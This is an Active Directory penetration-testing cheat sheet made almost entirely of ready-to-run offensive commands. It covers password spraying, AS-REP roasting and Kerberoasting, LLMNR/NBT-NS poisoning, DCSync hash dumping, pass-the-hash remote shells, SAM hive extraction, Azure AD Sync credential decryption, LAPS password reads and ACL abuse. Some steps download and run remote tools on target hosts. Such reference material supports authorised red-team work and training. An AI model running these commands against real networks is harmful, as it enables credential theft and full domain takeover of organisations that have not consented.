Active Directory
Here you will find a detailed CheatSheet for Active Directory
Enumeration and Exploitation
RPC Enumeration
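# Anonymous (NULL session) bind with rpcclient -- only works if the DC still permits
# anonymous SAMR access, which hardened domains disable
rpcclient -U "" -N <IP>
# Authenticated bind; pass -W so the logon domain is <DOMAIN> instead of WORKGROUP
rpcclient -U "<User>" -W <DOMAIN> <IP>
# Password for [<DOMAIN>\<User>]: <Pass>   <- interactive prompt, not a command to type
# Commands inside the rpcclient prompt ->
> enumdomusers # List domain users (prints name and RID in hex)
> enumdomgroups # List domain groups
> queryuser <RID> # Info about a user (use the hex RID printed by enumdomusers, e.g. 0x1f4)
> querygroup <RID> # Info about a group
> querygroupmem <RID> # Group membership
> getusername # Current session username
> getdompwinfo # Password policy (min length, properties) -- read it before any spraying
> getdomusers # Sometimes shows full list (legacy domains); not documented in every rpcclient version -- querydispinfo is the standard equivalent
> srvinfo # System info (OS, domain, DC name, etc.)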
LDAP Enumeration
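# Dump everything an authenticated user can read (writes HTML/JSON/grep files to the CWD).
# The tool is ldapdomaindump and the credential is written DOMAIN\USER, not USER\DOMAIN
ldapdomaindump -u '<DOMAIN>\<USER>' -p '<PASS>' <IP>
# Discover the base DN first via the rootDSE (anonymous bind)
ldapsearch -x -H ldap://<IP> -s base namingcontexts
# Enumerate every object readable via a NULL session (one dc= per component, e.g. dc=corp,dc=local)
ldapsearch -x -H ldap://<IP> -b "dc=<domain>,dc=<tld>"
# Enumerate Domain Admins with windapsearch
python3 windapsearch.py --dc-ip <IP> -u <USER>@<DOMAIN> -p <PASS> --da
# Enumerate privileged users (-PU); the password placeholder was <USER> here by mistake
python3 windapsearch.py --dc-ip <IP> -u <USER>@<DOMAIN> -p <PASS> -PU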
Kerberos Enumeration
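# Enumerate valid usernames via Kerberos pre-auth (does not increment badPwdCount, so no lockouts)
kerbrute userenum -d <domain> --dc <DC-IP> users.txt
# Password spray via Kerberos pre-auth: every attempt counts against the lockout threshold,
# so read the policy (getdompwinfo / --pass-pol) first and stay under it
kerbrute passwordspray -d <domain> --dc <DC-IP> users.txt '<Password>'
# AS-REP Roasting: accounts with "Do not require Kerberos preauthentication"; no creds needed.
# Crack with hashcat -m 18200
impacket-GetNPUsers <domain>/ -no-pass -usersfile users.txt -dc-ip <DC-IP> -format john
# Kerberoasting: request a TGS for every account with an SPN (any valid domain user suffices).
# Crack with hashcat -m 13100. The password lands in shell history/ps output -- prefer -k or an env var on shared hosts
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC-IP> -request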
SMB Enumeration
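# Password spray over SMB: one password against many users. --no-bruteforce is for PAIRED
# lists (user N with password N) and with a single password can stop after the first user,
# so it is left off here; --continue-on-success keeps going after a hit.
# Check --pass-pol for the lockout threshold BEFORE running this
netexec smb <IP> -u users.txt -p '<PASSWORD>' --continue-on-success
# List shares anonymously (null session)
netexec smb <target> -u '' -p '' --shares
# List shares with credentials (the READ/WRITE column shows where you can drop files)
netexec smb <target> -u user -p pass --shares
# Enumerate users, groups and logged-on sessions against the DC (one flag per invocation;
# the original "--users / --groups / --sessions" is not a valid single command line)
netexec smb <DC-IP> -d <Domain> -u user -p pass --users
netexec smb <DC-IP> -d <Domain> -u user -p pass --groups
netexec smb <DC-IP> -d <Domain> -u user -p pass --sessions
# RID cycling over a null session -- often still works when enumdomusers is denied
netexec smb <target> -u '' -p '' --rid-brute
# Dump the local SAM (requires local admin on <target>); expect AV/EDR to notice the LSA access
netexec smb <target> -u user -p pass --sam
# Password policy: lockout threshold and observation window
netexec smb <target> -u user -p pass --pass-pol
# Full enumeration with enum4linux-ng: -P is password policy only, -A runs all modules
enum4linux-ng -A <IP>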
LLMNR/NBT-NS Poisoning — Linux
# Activate responder
sudo responder -I ens224
# Crack the NTLMv2 hash
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
LLMNR/NBT-NS Poisoning — Windows
# Import Inveigh.ps1
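# Import Inveigh (PowerShell version)
Import-Module .\Inveigh.ps1
# Poison LLMNR and NBT-NS on the interface. The parameter name was missing before the first
# "Y" in the original, which PowerShell binds positionally to whatever the first parameter is
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
# Inveigh C# version (InveighZero) -- same defaults; typically needs an elevated prompt for raw sockets
.\Inveigh.exe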
User enumeration with Enum4linux
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
DCSync
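# DCSync: pull secrets from the DC over the replication protocol (DRSUAPI). Requires the
# "Replicating Directory Changes" and "Replicating Directory Changes All" rights on the domain
# object -- Domain Admins / Enterprise Admins have them by default; GenericAll or WriteDACL on
# the domain object lets you grant them to yourself
impacket-secretsdump '<DOMAIN>/<USER>:<PASS>@<IP>'
# Only the NTDS NT hashes (skips the DC's own SAM/LSA, less output and noise)
impacket-secretsdump -just-dc-ntlm '<DOMAIN>/<USER>:<PASS>@<IP>'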
Pass-the-Hash (NT hash only; LM hash is not needed)
# Pass-the-Hash: authenticate with the NT hash instead of the password. Impacket's -hashes
# takes LM:NT and the LM half may be empty (":<NT>"); netexec's -H takes the NT hash alone.
# For local (non-domain) accounts add --local-auth to netexec
# NetExec over SMB (add -x '<cmd>' to execute commands when the account is local admin)
netexec smb <target-ip> -u <user> -H <NTLM_hash>
# Impacket wmiexec -- semi-interactive shell over WMI/DCOM, no service binary dropped
impacket-wmiexec -hashes :<NTLM_hash> <domain>/<user>@<target>
# Impacket psexec -- uploads and runs a service binary over SMB (noisier, SYSTEM shell)
impacket-psexec -hashes :<NTLM_hash> <domain>/<user>@<target>
# Impacket smbclient -- interactive share browsing only, no code execution
impacket-smbclient -hashes :<NTLM_hash> <domain>/<user>@<target>
# Evil-WinRM -- needs WinRM (5985) reachable and the user in Remote Management Users or local Administrators
evil-winrm -i <ip> -u <user> -H <NTLM_hash>
WinRM
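# Password login over WinRM (HTTP listener, TCP 5985; add -S for the HTTPS listener on 5986)
evil-winrm -i <IP> -u <user> -p <pass>
# Certificate login: client certificate + private key. Certificate auth only works over the
# SSL transport, so -S is required (the original line omitted it)
evil-winrm -i <IP> -c <cert.pem> -k <key.pem> -S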
Enumeration with BloodHound-python
bloodhound-python -u '<USER>' -p '<PASS>' -ns <IP> -d <DOMAIN> -c all
Enumeration with BloodHound
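# Start the BloodHound GUI (legacy, neo4j-backed) on the attack box
sudo bloodhound
# Transfer the SharpHound collector to the target, e.g. with evil-winrm's "upload SharpHound.exe".
# The collector must match the GUI version (legacy SharpHound vs. SharpHound CE) or the
# import fails; the bare "sharphound" line in the original was not a command
# Run the collector on the victim with every collection method (noisy: contacts every host
# for sessions and local admin checks)
.\SharpHound.exe -c All
# Retrieve the generated .zip and import it through the "Upload Data" / Ingest menu in the GUI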
Internal password spraying — Windows
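# Fetch the script. In PowerShell, wget is an alias of Invoke-WebRequest and does NOT write a
# file unless -OutFile is given (the original line only printed the response). The URL is the
# unpinned master branch head -- pin a commit hash and review the file before running it on a target
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/refs/heads/master/DomainPasswordSpray.ps1' -OutFile .\DomainPasswordSpray.ps1
# Import the module
Import-Module .\DomainPasswordSpray.ps1
# Spray one password across all enabled domain users. The script is meant to read the domain
# lockout policy and warn about it -- read that output before confirming. -ErrorAction
# SilentlyContinue hides errors (e.g. failed LDAP queries); drop it when troubleshooting
Invoke-DomainPasswordSpray -Password <PASS> -OutFile spray_success -ErrorAction SilentlyContinue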
Privilege Escalation
SeBackupPrivilege Abuse
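# On the Windows host: check whether the current token holds SeBackupPrivilege
whoami /priv
# ...
# Privilege Name                Description                    State
# ============================= ============================== =======
# SeBackupPrivilege             Back up files and directories  Enabled
# With it you can read any file regardless of its ACL, including the registry hives that hold
# the local account hashes. Registry key paths use backslashes (hklm/sam is not a valid key)
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\system.hive
# Copy both hives to the attack box and extract the local hashes offline
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
# Note: on a DC the domain hashes live in NTDS.dit, which reg save cannot read; that requires
# a volume shadow copy taken with the same privilege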
Winpeas
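# Download the release binary on the attack box. The URL is pinned to a release tag -- keep it
# that way rather than switching to a "latest" link. (If fetching from PowerShell use
# Invoke-WebRequest -OutFile; the bare wget alias prints the response instead of saving it)
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/winPEASx64.exe
# Execute it on the target. Do not dot-source (". .\file") an .exe -- that syntax is for
# .ps1 scripts; invoke the binary directly. Expect Defender/EDR to flag winPEAS
.\winPEASx64.exe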
Microsoft Azure AD Sync
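# Download AdDecrypt (pinned v1.0 release) on the attack box and unpack it
wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
unzip AdDecrypt.zip   # yields AdDecrypt.exe and mcrypt.dll, both needed on the target
# Upload both files to the Azure AD Connect server from the Evil-WinRM session
*Evil-WinRM* PS C:\Temp> upload mcrypt.dll
*Evil-WinRM* PS C:\Temp> upload AdDecrypt.exe
# Change into the AD Sync Bin directory before running: the tool presumably resolves the
# ADSync assemblies from the working directory, which is why the exe is then called by full path
cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
# -FullSQL reads the encrypted connector credentials from the ADSync LocalDB instance (needs
# local admin on the connector server). The recovered AD connector (MSOL_*) account typically
# holds DCSync rights -- treat the output as domain-admin equivalent
C:\Temp\AdDecrypt.exe -FullSQL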
Enumerating Security Controls
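# Windows Defender status (real-time protection, engine/signature state)
Get-MpComputerStatus
# Effective AppLocker rules: what can be executed, from where, and by whom
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
# PowerShell language mode; ConstrainedLanguage blocks most offensive tooling
$ExecutionContext.SessionState.LanguageMode
# The three LAPS cmdlets below come from LAPSToolkit, not from Windows -- load it first
Import-Module .\LAPSToolkit.ps1
# Groups delegated to read LAPS passwords
Find-LAPSDelegatedGroups
# Principals holding the extended right to read ms-Mcs-AdmPwd on LAPS-managed computers
Find-AdmPwdExtendedRights
# Computers that have a LAPS password set
Get-LAPSComputers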
Authenticated enumeration from powershell
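# List modules available for import (plain Get-Module only shows the ones already loaded)
Get-Module -ListAvailable
# Load the RSAT ActiveDirectory module (only present when RSAT / AD DS tools are installed)
Import-Module ActiveDirectory
# Domain info (functional level, FSMO role holders)
Get-ADDomain
# Users with an SPN set, i.e. Kerberoastable service accounts (the original comment said "user info")
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Trust relationships (direction and type matter for cross-domain attacks)
Get-ADTrust -Filter *
# Enumerate groups
Get-ADGroup -Filter * | Select-Object -Property Name
Get-ADGroup -Identity "Backup Operators"
# Enumerate group membership (Backup Operators is a privileged builtin group: members get backup/restore privileges on DCs)
Get-ADGroupMember -Identity "Backup Operators"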
PowerView commands
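# Import PowerView (dot-sourcing ". .\PowerView.ps1" also works)
Import-Module .\PowerView.ps1
# Domain info
Get-Domain
Get-DomainController
# Users / Groups / Memberships
Get-DomainUser
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"
# SPN / Kerberoasting for one account: Get-DomainSPNTicket takes the user object from the
# pipeline (the original "-username" switch is not one of its parameters)
Get-DomainUser -Identity svc-account | Get-DomainSPNTicket
# ACLs (privilege escalation paths): ACEs held by non-default principals
Find-InterestingDomainAcl
# Shares / Sessions / Local admins -- Find-DomainShare and Find-LocalAdminAccess touch every
# computer in the domain, which is noisy
Find-DomainShare
Get-NetSession -ComputerName target
Find-LocalAdminAccess
# Trusts
Get-DomainTrustMapping
Get-ForestTrust
# Convert user to SID
ConvertTo-SID -Name "user"
# Test whether the current user has local admin access on a host
Test-AdminAccess -ComputerName <target>
# Kerberoasting - enumerate accounts with an SPN
Get-DomainUser * -spn | Select-Object -Property samaccountname
# Target one account and request its service ticket (a TGS, not a TGT); pick ONE output format
Get-DomainUser -Identity <user> | Get-DomainSPNTicket -Format Hashcat
# Export all tickets to a CSV file (one format per run; Hashcat shown)
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\hashes.csv -NoTypeInformation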
Snaffler
# Snaffler hunts file shares for credentials and other sensitive files.
# Grab the release from https://github.com/SnaffCon/Snaffler
# Flags: -s print findings to stdout, -d domain to enumerate, -o log file, -v data = verbosity level
.\Snaffler.exe -v data -o snaffler.log -d <domain> -s
Basic Enumeration Commands — Windows
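# Hostname
hostname
# OS version (the build number fixes the patch baseline)
[System.Environment]::OSVersion.Version
# Installed hotfixes; wmic is deprecated and absent on recent builds, Get-HotFix is the equivalent
wmic qfe get Caption,Description,HotFixID,InstalledOn
Get-HotFix
# Environment variables. "set" is cmd.exe syntax -- in PowerShell it aliases Set-Variable and
# prompts for a name instead of listing; use the Env: drive
Get-ChildItem Env:
# Firewall state per profile
netsh advfirewall show allprofiles
# Defender service state. In PowerShell "sc" is an alias of Set-Content (the original line would
# have created a file named "query"); call the binary explicitly
sc.exe query windefend
# ARP cache and routing table -- cheap, passive view of the local segment
arp -a
route print
# Defender engine version
Get-MpComputerStatus | Select-Object -Property AMProductVersion
# Members of the local Administrators group (may include domain groups)
Get-LocalGroupMember -Group "Administrators"
# All domain users with Enabled flag and Description (descriptions frequently leak passwords);
# requires the ActiveDirectory module
Get-ADUser -Filter * -Properties Description, Enabled | Select-Object -Property SamAccountName, Enabled, Description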
LAPS Abuse
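# git cannot clone a subdirectory URL (.../tree/master/...); clone the repository root
git clone https://github.com/ztrhgf/LAPS
# Import the AdmPwd.PS module from its folder inside the clone
Import-Module ./LAPS/AdmPwd.PS/AdmPwd.PS.psd1
# Principals holding the extended right to read LAPS passwords (ms-Mcs-AdmPwd), across all OUs
Find-AdmPwdExtendedRights -Identity *
# Retrieve the cleartext local admin password for a computer (needs the right above)
Get-AdmPwdPassword -ComputerName <Computer name> | Select-Object -Property Password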
ACE Abuse
+------------------------+------------------------------------------------+-------------------------------------------------------------+
| Permission | Abused With | Enables Attack(s) |
+------------------------+------------------------------------------------+-------------------------------------------------------------+
| ForceChangePassword | Set-DomainUserPassword | Reset target user password |
| AddMember (WriteProperty on member) | Add-DomainGroupMember | Add user to privileged group |
| GenericAll | Set-DomainUserPassword / Add-DomainGroupMember | Full control (reset password, Kerberoasting, add to group) |
| GenericWrite | Set-DomainObject | Write non-protected attributes: add an SPN to a user (targeted Kerberoasting), set msDS-AllowedToActOnBehalfOfOtherIdentity on a computer (RBCD); on a group object, add members |
| WriteOwner | Set-DomainObjectOwner | Take ownership of object, then grant yourself rights with Add-DomainObjectAcl to reach full control |
| WriteDACL | Add-DomainObjectACL | Grant privileges (e.g. GenericAll, or DCSync rights on the domain object) to a principal you control |
| AllExtendedRights | Set-DomainUserPassword / Add-DomainGroupMember | Reset password or modify group membership |
| AddSelf | Add-DomainGroupMember | Add self to group with elevated rights |
+------------------------+------------------------------------------------+-------------------------------------------------------------+
ACL Enumeration
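# (Needs PowerView; Get-ADUser and Get-ADObject below need the ActiveDirectory module)
# ACEs granted to non-default principals -- first pass for abusable rights
Find-InterestingDomainAcl
# Current user's SID
$sid = Convert-NameToSid username
# Every ACE on every domain object where that SID is the trustee
Get-DomainObjectACL -Identity * | Where-Object {$_.SecurityIdentifier -eq $sid}
# Dump all sAMAccountNames to a file (for spraying or looping over principals later)
Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
# Reverse-resolve an extended-right GUID (e.g. an ObjectAceType value) to its name. The
# original had the quotes inside the angle brackets ($guid = <"guid">), which is not valid PowerShell
$guid = "<guid>"
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select-Object Name,DisplayName,DistinguishedName,rightsGuid | Where-Object {$_.rightsGuid -eq $guid} | Format-List
# Same query with GUIDs resolved inline (avoids the manual lookup above)
Get-DomainObjectACL -ResolveGUIDs -Identity * | Where-Object {$_.SecurityIdentifier -eq $sid}
# Repeat for another principal you control (the -Verbose on Where-Object added nothing and was dropped)
$sid2 = Convert-NameToSid <user>
Get-DomainObjectACL -ResolveGUIDs -Identity * | Where-Object {$_.SecurityIdentifier -eq $sid2}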
ACL Abuse
# (Needs PowerView)
# Build a PSCredential for the principal you control; the PowerView abuse cmdlets
# (Set-DomainUserPassword, Add-DomainGroupMember, ...) take it via -Credential.
# The plaintext password ends up in the PowerShell history/transcript -- clear it afterwards
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = [System.Management.Automation.PSCredential]::new('<DOMAIN>\<USER>', $SecPassword)